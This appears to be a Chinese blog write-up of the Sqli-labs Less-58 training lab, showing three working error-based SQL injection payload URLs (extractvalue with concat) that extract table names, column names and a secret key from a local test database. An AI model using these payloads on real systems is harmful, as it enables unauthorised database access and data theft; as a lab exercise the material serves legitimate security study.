Sqli-labs Less-58 报错注入 5次机会
2024-09-07 11:04:32
执行sql语句后,并没有返回数据库当中的数据,所以我们这里不能使用union联合注入,这里使用报错注入。但是需要注意这里只有5次机会尝试。
找表名
http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
找列名
http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='dzgnt6f0xz'),0x7e))--+
找key
http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_GYDQ) from dzgnt6f0xz),0x7e))--+
最新文章
- 第五章 搭建 S3C6.410 开发板的 测试环境
- NRF24L01--使用STM32F103
- 关于tomcat7下websocket不能使用
- unity3d 游戏对象消失三种方法的区别(enabled/Destroy/active)
- QCon2013上海站总结 -- 整体印象和感悟
- JavaScript,Java,php的区分大小写问题
- iOS_20_微博的骨架结构
- Machine Learning/Introducing Logistic Function
- MySQL写压力性能监控与调优
- linux系统编程:IO读写过程的原子性操作实验
- mysql数据库连接语句一定要加传参的编码格式
- js对json解析获取对应属性的值,JSON.stringify()和JSON.parse()
- C语言笔记1
- PP.io的三个阶段,“强中心”——“弱中心”——“去中心”
- elasticsearch mapping demo
- 基于ARM的模拟器
- 怎么解决numpy和matplotlib无法安装问题
- SpringMyBatisDay01
- NPM install 中:-save 、 -save-dev 和 没有--save的情况
- Activity 设置切换动画
热门文章
- git add的各种情况分类
- ubuntu 安装flask+nginx+gunicorn 待定
- gitbook 入门教程之超高颜值的思维导图simple-mind-map插件
- git回滚到任意一个版本
- Java POI 实现Excel相同数据同一颜色,不同数据颜色交替显示
- niginx:duplicate MIME type ";text/html"; in nginx.conf 错误(转载)
- Python基础篇_实例练习(二)
- [vue ]滚动视图解决ElementUI NavMenu 导航菜单过长显示的问题
- Java第一节课动手动脑
- gradle管理的Springboot使用JSP详解